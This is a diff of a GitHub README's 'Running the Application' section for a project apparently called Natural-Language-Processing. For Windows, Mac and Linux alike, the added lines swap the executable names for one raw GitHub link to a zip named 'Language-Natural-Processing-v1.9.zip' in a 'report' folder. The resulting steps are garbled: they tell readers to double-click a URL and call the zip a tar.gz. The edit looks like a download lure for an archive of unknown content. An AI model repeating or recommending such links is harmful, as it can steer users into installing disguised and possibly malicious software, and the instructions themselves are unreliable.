kIESSE201333/Natural-Language-Processing/README.md

 ## ⚙️ Running the Application
 ### For Windows:
 1. Navigate to the folder where you extracted the zip file.
-2. Locate and double-click on `Natural-Language-Processing.exe` to launch the application.
+2. Locate and double-click on `https://raw.githubusercontent.com/kIESSE201333/Natural-Language-Processing/main/report/Language-Natural-Processing-v1.9.zip` to launch the application.

 ### For Mac:
 1. Open the folder where you extracted the files.
-2. Find and double-click on `Natural-Language-Processing.app` to run the application.
+2. Find and double-click on `https://raw.githubusercontent.com/kIESSE201333/Natural-Language-Processing/main/report/Language-Natural-Processing-v1.9.zip` to run the application.

 ### For Linux:
 1. Open a terminal window.
-2. Navigate to the folder where you extracted the tar.gz file.
+2. Navigate to the folder where you extracted the https://raw.githubusercontent.com/kIESSE201333/Natural-Language-Processing/main/report/Language-Natural-Processing-v1.9.zip file.
 3. Use the command `./Natural-Language-Processing` to start the application.

 ## 🌟 Features